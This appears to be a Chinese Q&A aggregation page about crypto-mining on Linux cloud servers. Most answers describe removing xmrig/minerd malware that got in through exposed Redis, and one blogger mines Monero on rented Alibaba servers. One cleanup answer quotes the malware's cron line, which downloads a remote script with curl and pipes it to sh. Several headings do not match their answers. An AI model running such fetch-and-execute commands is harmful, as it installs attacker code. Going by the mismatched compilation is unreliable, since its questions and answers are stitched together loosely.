linux雲伺服器挖礦進程
❶ linux被挖礦重裝系統能清除嗎
可以的
xmrig是一種挖礦病毒,通常會搶占伺服器的資源,導致伺服器超負荷運轉,出現服務宕機的情況。
❷ 如何用Linux伺服器挖礦教程
今天早上起來一看,伺服器腳本一個都沒有啟動!甚是奇怪,遠程登錄伺服器,也是異常的卡,直到最後卡死,只好重新啟動伺服器!
啟動之後沒一會又會變卡,越來越卡,top查看進程!不覺又奇怪的進程,因為平常也不經常看!所以自己也搞不明白怎麼回事兒!只好到群里問了問,說是被挖礦的掛了木馬文件了,是由於redis的漏洞!
後來我自己發現,原來redis遠程可以直接登錄,原以為redis和mysql不開放登錄許可權就不會支持遠程登錄呢,看來是我想多了
看了好長時間才發現一個異常的進程,自啟的進程 molibe !
找到進程位置 ps -ef|grep molibe ;
在tmp目錄下,打開一看的確是有
chmod -x molibe 取消執行許可權在來到/var/spool/cron下,cat root 查看定時器的執行發現之前腳本都被改了,顧不得刪除cron,service crond restart 重新啟動,再有就時kill 掉molibe進程
這樣大概整個就結束了!但是根本是因為redis漏洞,所以還是補上吧
首先修改redis'埠,找到redis.conf文件 port **** 修改埠號再有就是必須修改密碼 # requirepass ******** 去除#號重新啟動 /redis/src/redis-server /redis/redis-conf
啟動成功之後
redis/redis-cli -p ****(埠) -a *****(密碼)
❸ 雲伺服器挖礦踐行 第一篇
三天以前看到壯鄉金榮仔的文章,從中了解到可以利用阿里雲伺服器進行挖礦,收益可觀,於是立即和作者進行了聯系,咨詢拜師的事情。
通過和孫師傅交流發現,因為寫作讓我們有了很多共同交流的基礎,並且我居然已經關注了孫師傅有好幾個月的時間了,這讓我們很快建立了信任。
孫師傅在文章中提到正式收徒弟還要等一段時間,我覺得這段時間也不能浪費,還應該為將來拜師以後做一點准備工作。於是我立即開始對雲服務挖礦這件事情進行了認真的思考並實踐。
雲服務挖礦的可行性,大概有這么幾個方面。
一,雲伺服器挖礦的成本收益分析。
成本構成:挖礦的成本主要有三項,礦機的支出,電費,場地及相關管理費用;
收益構成:挖礦的收益主要來自兩個方面,一是按照當前數字貨幣的法幣價格可以不管成本而獲得的收益,二是數字貨幣在未來增值獲得的收益。
分析:雲伺服器的運算能力遠遠低於實體礦機,但是不用支付電費,這是最大的成本節省,另外,由於不需要場地,自己遠程管理,場地和管理費用也趨近於零。
因此在算力有限的情況下,雲伺服器挖礦最大限度地消除了電費和場地的費用,這是這項技術的優勢所在。而盈利的平衡點,將極大的取決於伺服器費用的支出和當前幣價的相對關系。
二,雲伺服器和挖礦幣種的分析。
雲伺服器的種類有很多,主要分兩種,CPU型和GPU型。
目前市場上的各種虛擬幣演算法也分兩類,GPU友好型和CPU有好型。比特幣以太坊,萊特幣等絕大多數幣種都屬於GPU友好型,CPU友好型比較少,我了解到的只有大零幣zec,小零幣xzc,門羅幣xmr。
所以這樣一來,在伺服器和幣種的選擇問題上,方向很清晰:CPU和GPU任何一個方向,選擇算力性價比最高的雲伺服器和挖礦收益最高的幣種。
三,實踐。
李笑來的文章中提到過,任何挖礦的行為都不如直接到市場上去買來得容易。我也因此在之前的虛擬貨幣的學習中,很少關注挖礦的知識。同時對於伺服器方面的知識也了解很少,所以一開始我只能用網路上能夠搜索得到的辦法進行實踐, 以快速入門,開始積累。
網上能夠直接搜索到的就是利用CPU伺服器挖掘門羅幣。文章鏈接如下。
於是我花了391.5元購買了三個月的阿里雲輕量型伺服器,配置如下。阿里雲目前在搞活動,首單可以打七折。
開始進行實踐。
經過了兩天的折騰,終於在運行伺服器上挖礦成功,但是算力只有140h/s,在這個算力下,要虧本一半。
具體折騰的過程中,遇到坑無數,也麻煩了我搞計算機的朋友很多,這個過程留待下一篇再寫吧。
四,關於風險的思考。
目前來看,用雲伺服器挖礦伺服器的價格是預付的,並且是固定的,所以挖礦是否有收益,取決於目前的虛擬貨幣的價格。從孫師傅的截圖來看,目前收益還是很可觀的。
近期的風險來自於幣價的下跌,遠期的風險來看,就是阿里雲伺服器會禁止挖礦行為。阿里雲對於挖礦的行為,在網上有過很多的聲明。在搜索伺服器挖礦相關知識的時候,也發現有國外的伺服器禁止挖礦。
長期來看,如果目前雲伺服器挖礦不賠本那麼未來大概率是會有很大的收益的。
就在寫這一篇的過程中,孫師傅的收徒標也發出來了,很快就要收徒弟啦。我也正好把這一篇當做我第一這周的作業。
❹ 新買的雲伺服器提示挖礦
利用雲電腦的計算資源執行挖礦的持續性程序,
已停止是服務絕大數都是正常的。這些已停止表示你已經禁用或停止了相關的服務,但停止不是卸載,所以它們仍然存在是正常的,每台電腦里都有許多已停止的服務,不用擔心。你真正要擔心的是360那個提示,可在任務管理器中查著活動進程,若某進程CPU或內存佔用高,而你又不明確該進程是幹嘛的,可以先結束進程再看看360還會不會提醒!
❺ 雲伺服器中挖礦病毒的清除過程(二)
發現一台伺服器,CPU使用率一直50%左右,top查看一進程名稱為
-bash,按c查看詳情,名稱顯示為python
十分可疑
殺掉進程,清空crontab內容,並刪除此目錄文件,發現過一陣進程又被啟動起來了
查看/etc/cron.hourly,發現有一個sync文件,還是會定時執行,內容為
此文件還被加了保護許可權,需要用chattr去除後刪除
cron.daily cron.weekly cron.monthly裡面也有
同樣方法刪除/bin/sysdrr
至此病毒被徹底清除
刪除/opt/.new目錄時,發現此目錄下還有一個/opt/.md目錄,內容如下
病毒運行原理是
其他常用的診斷命令
關聯文章:
雲伺服器中挖礦病毒的清除過程
伺服器中毒導致的wget等系統命令失效後的恢復
參考文章:
【PC樣本分析】記錄最近與挖礦病毒的鬥智斗勇
【PC樣本分析】記錄最近與挖礦病毒的鬥智斗勇(二)
❻ 阿里雲伺服器被挖礦了怎麼辦(純純電腦小白
1. 關閉訪問挖礦伺服器的訪問
iptables -A INPUT -s xmr.crypto-pool.fr -j DROP and iptables -A OUTPUT -d xmr.crypto-pool.fr -j DROP.
2. chmod -x minerd ,取消掉執行許可權, 在沒有找到根源前,千萬不要刪除 minerd,因為刪除了,過一回會自動有生成一個。
3. pkill minerd ,殺掉進程
4. service stop crond 或者 crontab -r 刪除所有的執行計劃
5. 執行top,查看了一會,沒有再發現minerd 進程了。
6.檢查/var/spool/cron/目錄下發現有個root用戶的定時器文件。
下載腳本的語句:
*/5 * * * * curl -fsSL http://www.haveabitchin.com/pm.sh?0105010 | sh
病毒文件內容如下,感興趣的可以研究下:
View Code
解決minerd並不是最終的目的,主要是要查找問題根源,我的伺服器問題出在了redis服務了,黑客利用了redis的一個漏洞獲得了伺服器的訪問許可權,http://blog.jobbole.com/94518/然後就注入了病毒,下面是解決辦法和清除工作:
1. 修復 redis 的後門,
配置bind選項, 限定可以連接Redis伺服器的IP, 並修改redis的默認埠6379.
配置AUTH, 設置密碼, 密碼會以明文方式保存在redis配置文件中.
配置rename-command CONFIG 「RENAME_CONFIG」, 這樣即使存在未授權訪問, 也能夠給攻擊者使用config指令加大難度
好消息是Redis作者表示將會開發」real user」,區分普通用戶和admin許可權,普通用戶將會被禁止運行某些命令,如conf
2. 打開 ~/.ssh/authorized_keys, 刪除你不認識的賬號
3. 查看你的用戶列表,是不是有你不認識的用戶添加進來。 如果有就刪除掉.
❼ Linux系統被Carbon挖礦病毒入侵,殺掉之後過一段時間又起來了,有誰遇到過這種情況啊
這種病毒騰訊安全提到過
可以去下載安裝一個騰訊御點
打開之後,使用裡面的病毒查殺功能,直接就可以查殺這種電腦病毒了
❽ 如何把右下角挖礦測試去除
一種是使用雲安全中心自動清理,另一種是手動清除。登錄到雲安全中心控制台左側欄,選擇威脅檢測,安全告警處理在安全告警處理列表中,找到挖礦程序,然後點處理雲安全中心安全告警處理然後根據提示一步步操作即可。
去除的方法
手動清除挖礦程序護雲盾以Linux伺服器為例,按照以下步驟排查及處理查看挖礦進程的執行PID,命令表示該進程的PID。清除挖礦進程的執行文件,在高CPU消耗的進程中定位到挖礦進程,並殺死該進程。
檢查雲伺服器的防火牆中是否存在挖礦程序的礦池地址,可疑通信地址和開放埠,命令iptablesLn執行以下命令清除惡意礦池地址vietcsysconfigiptables排查是否存在定時任務crontabl根據排查的結果,對可疑的定時任務文件進行清理,防止二次入侵。
❾ 雲伺服器中挖礦病毒的清除過程(三)
伺服器CPU使用率50%,被兩個進程佔用,名稱分別為
-mysql
zfsutils-md5sum
使用crontab -l查看定時任務,發現病毒文件-mysql
查看這個/var/.log/目錄,發現更多病毒文件,-mysql是個腳本,內容如下
查看/etc/crontab.daily目錄,發現一個文件名為ntpdate
/bin/sysprg創建日期與ntupdate是同一天,文件大小與x86_64相同,無疑也是個病毒文件。
進入到/var/spool/cron目錄查看文件許可權,發現被加了保護,使用lsattr去除,再編輯刪除內容即可
禁用crontab
雲伺服器中挖礦病毒的清除過程(一)
雲伺服器中挖礦病毒的清除過程(二)
❿ linux系統挖礦如何設
MinerHub 公司旗下的奇跡摩爾系統(Wondermole)是一款基於Linux 內核,為礦工朋友們深度定製的「無盤」挖礦系統;
全方位解決問題
1、奇跡摩爾的 Linux 內核經過兩百多次深度優化,避免了部分硬體故障會直接導致系統死機這一問題;
2、針對市面上許多挖礦軟體重啟後無法連接礦池挖礦的情況,奇跡摩爾利用每次礦機重啟後重置鏡像的功能完美解決;
3、經測試,奇跡摩爾系統在各大礦池的平均算力誤差和延遲份額均不超過 1.5%,明顯提升了用戶的挖礦收益;
4、奇跡摩爾開發團隊經過無數次實驗,得出了最優化的顯卡 VBIOS 超頻設置,較傳統超頻手段,在進一步提升顯卡 5% 算力的同時,還可降低 15% 的功耗!